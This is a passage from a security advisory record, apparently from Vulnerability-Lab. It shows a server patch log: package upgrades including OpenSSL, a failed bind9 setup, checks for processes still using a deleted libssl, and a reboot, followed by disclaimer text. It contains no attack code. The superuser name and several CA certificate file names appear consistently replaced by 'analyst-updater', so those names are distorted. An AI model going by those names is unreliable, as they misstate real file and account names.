UTC 2014.\r\nRun \\'dpkg-reconfigure tzdata\\' if you wish to change it.\r\n\r\n(Reading database ... 159289 files and directories currently installed.)\r\nPreparing to replace php5-cgi 5.3.10-1ubuntu3.10 (using .../php5-cgi_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cgi ...\r\nPreparing to replace openssl 1.0.1-4ubuntu5.11 (using .../openssl_1.0.1-4ubuntu5.12_amd64.deb) ...\r\nUnpacking replacement openssl ...\r\nPreparing to replace apache2-prefork-dev 2.2.22-1ubuntu1.4 (using .../apache2-prefork-dev_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-prefork-dev ...\r\nPreparing to replace apache2 2.2.22-1ubuntu1.4 (using .../apache2_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2 ...\r\nPreparing to replace apache2-mpm-prefork 2.2.22-1ubuntu1.4 (using .../apache2-mpm-prefork_2.2.22-1ubuntu1.5_amd64.deb) ...\r\n * Stopping web server apache2 ... waiting . [ OK ]\r\nUnpacking replacement apache2-mpm-prefork ...\r\nPreparing to replace apache2.2-common 2.2.22-1ubuntu1.4 (using .../apache2.2-common_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-common ...\r\nPreparing to replace apache2.2-bin 2.2.22-1ubuntu1.4 (using .../apache2.2-bin_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2.2-bin ...\r\nPreparing to replace apache2-utils 2.2.22-1ubuntu1.4 (using .../apache2-utils_2.2.22-1ubuntu1.5_amd64.deb) ...\r\nUnpacking replacement apache2-utils ...\r\nPreparing to replace libapache2-mod-php5 5.3.10-1ubuntu3.10 (using .../libapache2-mod-php5_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement libapache2-mod-php5 ...\r\nPreparing to replace php5-mysql 5.3.10-1ubuntu3.10 (using .../php5-mysql_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-mysql ...\r\nPreparing to replace php5-xsl 5.3.10-1ubuntu3.10 (using .../php5-xsl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-xsl ...\r\nPreparing to replace php5-curl 5.3.10-1ubuntu3.10 (using 
.../php5-curl_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-curl ...\r\nPreparing to replace php5-gd 5.3.10-1ubuntu3.10 (using .../php5-gd_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-gd ...\r\nPreparing to replace php5-cli 5.3.10-1ubuntu3.10 (using .../php5-cli_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-cli ...\r\nPreparing to replace php5-sqlite 5.3.10-1ubuntu3.10 (using .../php5-sqlite_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-sqlite ...\r\nPreparing to replace php5-common 5.3.10-1ubuntu3.10 (using .../php5-common_5.3.10-1ubuntu3.11_amd64.deb) ...\r\nUnpacking replacement php5-common ...\r\nPreparing to replace icedtea-6-jre-cacao 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-cacao_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-cacao ...\r\nPreparing to replace openjdk-6-jre-lib 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-lib_6b30-1.13.1-1ubuntu2~0.12.04.3_all.deb) ...\r\nUnpacking replacement openjdk-6-jre-lib ...\r\nPreparing to replace icedtea-6-jre-jamvm 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../icedtea-6-jre-jamvm_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement icedtea-6-jre-jamvm ...\r\nPreparing to replace openjdk-6-jre-headless 6b30-1.13.1-1ubuntu2~0.12.04.1 (using .../openjdk-6-jre-headless_6b30-1.13.1-1ubuntu2~0.12.04.3_amd64.deb) ...\r\nUnpacking replacement openjdk-6-jre-headless ...\r\nPreparing to replace sudo 1.8.3p1-1ubuntu3.4 (using .../sudo_1.8.3p1-1ubuntu3.6_amd64.deb) ...\r\nUnpacking replacement sudo ...\r\nPreparing to replace ifupdown 0.7~beta2ubuntu10 (using .../ifupdown_0.7~beta2ubuntu11_amd64.deb) ...\r\nUnpacking replacement ifupdown ...\r\nPreparing to replace initramfs-tools 0.99ubuntu13.4 (using .../initramfs-tools_0.99ubuntu13.5_all.deb) ...\r\nUnpacking replacement initramfs-tools ...\r\nPreparing to replace initramfs-tools-bin 0.99ubuntu13.4 (using 
.../initramfs-tools-bin_0.99ubuntu13.5_amd64.deb) ...\r\nUnpacking replacement initramfs-tools-bin ...\r\nPreparing to replace udev 175-0ubuntu9.4 (using .../udev_175-0ubuntu9.5_amd64.deb) ...\r\nAdding \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nUnpacking replacement udev ...\r\nPreparing to replace ca-certificates 20111211 (using .../ca-certificates_20130906ubuntu0.12.04.1_all.deb) ...\r\nUnpacking replacement ca-certificates ...\r\nPreparing to replace openssh-server 1:5.9p1-5ubuntu1.1 (using .../openssh-server_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-server ...\r\nPreparing to replace openssh-client 1:5.9p1-5ubuntu1.1 (using .../openssh-client_1%3a5.9p1-5ubuntu1.3_amd64.deb) ...\r\nUnpacking replacement openssh-client ...\r\nPreparing to replace libclamav6 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../libclamav6_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement libclamav6 ...\r\nPreparing to replace clamav-base 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-base_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_all.deb) ...\r\nUnpacking replacement clamav-base ...\r\nPreparing to replace clamav-freshclam 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav-freshclam_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\n * Stopping ClamAV virus database updater freshclam [ OK ]\r\nUnpacking replacement clamav-freshclam ...\r\nPreparing to replace clamav 0.97.8+dfsg-1ubuntu1.12.04.1 (using .../clamav_0.98.1+dfsg-4ubuntu1~ubuntu12.04.2_amd64.deb) ...\r\nUnpacking replacement clamav ...\r\nPreparing to replace libpq-dev 9.1.12-0ubuntu0.12.04 (using .../libpq-dev_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq-dev ...\r\nPreparing to replace libpq5 9.1.12-0ubuntu0.12.04 (using .../libpq5_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement libpq5 ...\r\nPreparing to replace linux-firmware 1.79.10 (using .../linux-firmware_1.79.11_all.deb) ...\r\nUnpacking replacement linux-firmware 
...\r\nPreparing to replace php5 5.3.10-1ubuntu3.10 (using .../php5_5.3.10-1ubuntu3.11_all.deb) ...\r\nUnpacking replacement php5 ...\r\nPreparing to replace postgresql-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\n * Stopping PostgreSQL 9.1 database server [ OK ]\r\nUnpacking replacement postgresql-9.1 ...\r\nPreparing to replace postgresql-client-9.1 9.1.12-0ubuntu0.12.04 (using .../postgresql-client-9.1_9.1.13-0ubuntu0.12.04_amd64.deb) ...\r\nUnpacking replacement postgresql-client-9.1 ...\r\nPreparing to replace udisks 1.0.4-5ubuntu2.1 (using .../udisks_1.0.4-5ubuntu2.2_amd64.deb) ...\r\nUnpacking replacement udisks ...\r\nProcessing triggers for man-db ...\r\nProcessing triggers for ureadahead ...\r\nProcessing triggers for ufw ...\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nSetting up libssl-doc (1.0.1-4ubuntu5.12) ...\r\nSetting up libssl-dev (1.0.1-4ubuntu5.12) ...\r\nSetting up libgtk-3-common (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-0 (3.4.2-0ubuntu0.7) ...\r\nSetting up libgtk-3-bin (3.4.2-0ubuntu0.7) ...\r\nSetting up libnss3-1d (3.15.4-0ubuntu0.12.04.2) ...\r\nSetting up librsvg2-2:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up librsvg2-common:i386 (2.36.1-0ubuntu1.1) ...\r\nSetting up libmagic1 (5.09-2ubuntu0.3) ...\r\nSetting up file (5.09-2ubuntu0.3) ...\r\nSetting up tzdata-java (2014a-0ubuntu0.12.04) ...\r\nSetting up php5-common (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-cgi (5.3.10-1ubuntu3.11) ...\r\nSetting up openssl (1.0.1-4ubuntu5.12) ...\r\nSetting up apache2.2-bin (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-utils (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2.2-common (2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-prefork-dev 
(2.2.22-1ubuntu1.5) ...\r\nSetting up apache2-mpm-prefork (2.2.22-1ubuntu1.5) ...\r\n * Starting web server apache2 [ OK ]\r\nSetting up apache2 (2.2.22-1ubuntu1.5) ...\r\nSetting up libapache2-mod-php5 (5.3.10-1ubuntu3.11) ...\r\n * Reloading web server config apache2 [ OK ]\r\nSetting up php5-cli (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-mysql (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-xsl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-curl (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-gd (5.3.10-1ubuntu3.11) ...\r\nSetting up php5-sqlite (5.3.10-1ubuntu3.11) ...\r\nSetting up sudo (1.8.3p1-1ubuntu3.6) ...\r\nInstalling new version of config file /etc/init.d/sudo ...\r\nSetting up ifupdown (0.7~beta2ubuntu11) ...\r\nSetting up initramfs-tools-bin (0.99ubuntu13.5) ...\r\nSetting up ca-certificates (20130906ubuntu0.12.04.1) ...\r\nUpdating certificates in /etc/ssl/certs... 21 added, 9 removed; done.\r\nRunning hooks in /etc/ca-certificates/update.d....\r\nAdding debian:Actalis_Authentication_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_2_analyst-updater_CA.pem\r\nAdding debian:Buypass_Class_3_analyst-updater_CA.pem\r\nAdding debian:CA_Disig_analyst-updater_R1.pem\r\nAdding debian:CA_Disig_analyst-updater_R2.pem\r\nAdding debian:China_Internet_Network_Information_Center_EV_Certificates_analyst-updater.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_2009.pem\r\nAdding debian:D-TRUST_analyst-updater_Class_3_CA_2_EV_2009.pem\r\nAdding debian:EC-ACC.pem\r\nAdding debian:EE_Certification_Centre_analyst-updater_CA.pem\r\nAdding debian:Hellenic_Academic_and_Research_Institutions_analyst-updaterCA_2011.pem\r\nAdding debian:PSCProcert.pem\r\nAdding debian:Security_Communication_analyst-updaterCA2.pem\r\nAdding debian:StartCom_Certification_Authority_2.pem\r\nAdding debian:StartCom_Certification_Authority_G2.pem\r\nAdding debian:Swisscom_analyst-updater_CA_2.pem\r\nAdding debian:Swisscom_analyst-updater_EV_CA_2.pem\r\nAdding 
debian:Trustis_FPS_analyst-updater_CA.pem\r\nAdding debian:T-TeleSec_Globalanalyst-updater_Class_3.pem\r\nAdding debian:TURKTRUST_Certificate_Services_Provider_analyst-updater_2007.pem\r\nAdding debian:Verisign_Class_3_Public_Primary_Certification_Authority_2.pem\r\nRemoving debian:cacert.org.pem\r\nRemoving debian:ca.pem\r\nRemoving debian:Equifax_Secure_eBusiness_CA_2.pem\r\nRemoving debian:TC_TrustCenter_Universal_CA_III.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_2_CA.pem\r\nRemoving debian:TC_TrustCenter__Germany__Class_3_CA.pem\r\nRemoving debian:Verisign_Class_2_Public_Primary_Certification_Authority.pem\r\nRemoving debian:Verisign_Class_4_Public_Primary_Certification_Authority_-_G2.pem\r\nRemoving debian:spi-ca-2003.pem\r\ndone.\r\ndone.\r\nSetting up openssh-client (1:5.9p1-5ubuntu1.3) ...\r\nSetting up openssh-server (1:5.9p1-5ubuntu1.3) ...\r\nssh stop/waiting\r\nssh start/running, process 14149\r\nSetting up libclamav6 (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up clamav-base (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nReplacing config file /etc/clamav/clamd.conf with new version\r\nSetting up clamav-freshclam (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nInstalling new version of config file /etc/init.d/clamav-freshclam ...\r\nReplacing config file /etc/clamav/freshclam.conf with new version\r\n * Starting ClamAV virus database updater freshclam [ OK ]\r\nSetting up clamav (0.98.1+dfsg-4ubuntu1~ubuntu12.04.2) ...\r\nSetting up libpq5 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up libpq-dev (9.1.13-0ubuntu0.12.04) ...\r\nSetting up linux-firmware (1.79.11) ...\r\nSetting up php5 (5.3.10-1ubuntu3.11) ...\r\nSetting up postgresql-client-9.1 (9.1.13-0ubuntu0.12.04) ...\r\nSetting up postgresql-9.1 (9.1.13-0ubuntu0.12.04) ...\r\n * Starting PostgreSQL 9.1 database server [ OK ]\r\nSetting up openjdk-6-jre-headless (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up openjdk-6-jre-lib (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up 
icedtea-6-jre-cacao (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up icedtea-6-jre-jamvm (6b30-1.13.1-1ubuntu2~0.12.04.3) ...\r\nSetting up udev (175-0ubuntu9.5) ...\r\nudev stop/waiting\r\nudev start/running, process 16013\r\nRemoving \\'diversion of /sbin/udevadm to /sbin/udevadm.upgrade by fake-udev\\'\r\nupdate-initramfs: deferring update (trigger activated)\r\nSetting up udisks (1.0.4-5ubuntu2.2) ...\r\nSetting up initramfs-tools (0.99ubuntu13.5) ...\r\nupdate-initramfs: deferring update (trigger activated)\r\nProcessing triggers for libc-bin ...\r\nldconfig deferred processing now taking place\r\nProcessing triggers for libgdk-pixbuf2.0-0:i386 ...\r\nProcessing triggers for initramfs-tools ...\r\nupdate-initramfs: Generating /boot/initrd.img-3.2.0-60-generic\r\nSetting up bind9 (1:9.8.1.dfsg.P1-4ubuntu0.8) ...\r\n * Starting domain name service... bind9 [fail]\r\ninvoke-rc.d: initscript bind9, action \\\"start\\\" failed.\r\ndpkg: error processing bind9 (--configure):\r\n subprocess installed post-installation script returned error exit status 1\r\nErrors were encountered while processing:\r\n bind9\r\nE: Sub-process /usr/bin/dpkg returned an error code (1)\r\nanalyst-updater@h2072833:~# ps uwwp $(sudo find /proc -maxdepth 2 -name maps -exec grep -HE \\'/libssl\\\\.so.* \\\\(deleted\\\\)\\' {} \\\\; | cut -d/ -f3 | sort -u)\r\nERROR: List of process IDs must follow p.\r\n********* simple selection ********* ********* selection by list *********\r\n-A all processes -C by command name\r\n-N negate selection -G by real group ID (supports names)\r\n-a all w/ tty except session leaders -U by real user ID (supports names)\r\n-d all except session leaders -g by session OR by effective group name\r\n-e all processes -p by process ID\r\nT all processes on this terminal -s processes in the sessions given\r\na all w/ tty, including other users -t by tty\r\ng OBSOLETE -- DO NOT USE -u by effective user ID (supports names)\r\nr only running processes U processes for 
specified users\r\nx processes w/o controlling ttys t by tty\r\n*********** output format ********** *********** long options ***********\r\n-o,o user-defined -f full --Group --User --pid --cols --ppid\r\n-j,j job control s signal --group --user --sid --rows --info\r\n-O,O preloaded -o v virtual memory --cumulative --format --deselect\r\n-l,l long u user-oriented --sort --tty --forest --version\r\n-F extra full X registers --heading --no-heading --context\r\n ********* misc options *********\r\n-V,V show version L list format codes f ASCII art forest\r\n-m,m,-L,-T,H threads S children in sum -y change -l format\r\n-M,Z security data c true command name -c scheduling class\r\n-w,w wide output n numeric WCHAN,UID -H process hierarchy\r\nanalyst-updater@h2072833:~# ls -l /proc/*/fd | grep ssl.*(deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\nl-wx------ 1 analyst-updater analyst-updater 64 Apr 9 12:23 16 -> /run/apache2/ssl_mutex (deleted)\r\n\r\nanalyst-updater@h2072833:~# openssl version\r\nOpenSSL 1.0.1 14 Mar 2012\r\nanalyst-updater@h2072833:~# sudo reboot\r\n\r\nBroadcast message from analyst-updater@h2072833.ben-kenobi-server.net\r\n (/dev/pts/0) at 12:16 ...\r\n\r\nThe system is going down for reboot 
NOW!\r\n\r\n\r\n\r\nPicture(s):\r\nhttp://www.vulnerability-lab.com/resources/pictures/1.png\r\nhttp://www.vulnerability-lab.com/resources/pictures/2.png\r\n\r\n\r\nCredits & Authors:\r\n==================\r\nVulnerability Laboratory [Research Team]\r\n\r\n\r\nDisclaimer & Information:\r\n=========================\r\nThe information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, \r\neither expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-\r\nLab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business \r\nprofits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some \r\nstates do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation \r\nmay not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases \r\nor trade with fraud/stolen material.\r\n\r\nDomains: www.vulnerability-lab.com \t- www.vuln-lab.com\t\t\t - www.vulnerability-lab.com/register\r\nContact: admin@vulnerability-lab.com \t- support@vulnerability-lab.com \t - research@vulnerability-lab.com\r\nSection: video.vulnerability-lab.com \t- forum.vulnerability-lab.com \t\t - news.vulnerability-lab.com\r\nSocial:\t twitter.com/#!/vuln_lab \t\t- facebook.com/VulnerabilityLab \t - youtube.com/user/vulnerability0lab\r\nFeeds:\t vulnerability-lab.com/rss/rss.php\t- vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php\r\n\r\nAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. \r\nPermission to electronically redistribute this alert in its unmodified form is granted. 
All other rights, including the use of other \r\nmedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and \r\nother information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), \r\nmodify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.\r\n\r\n \t\t\t\t \tCopyright \u00a9 2012 | Vulnerability Laboratory\r\n\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}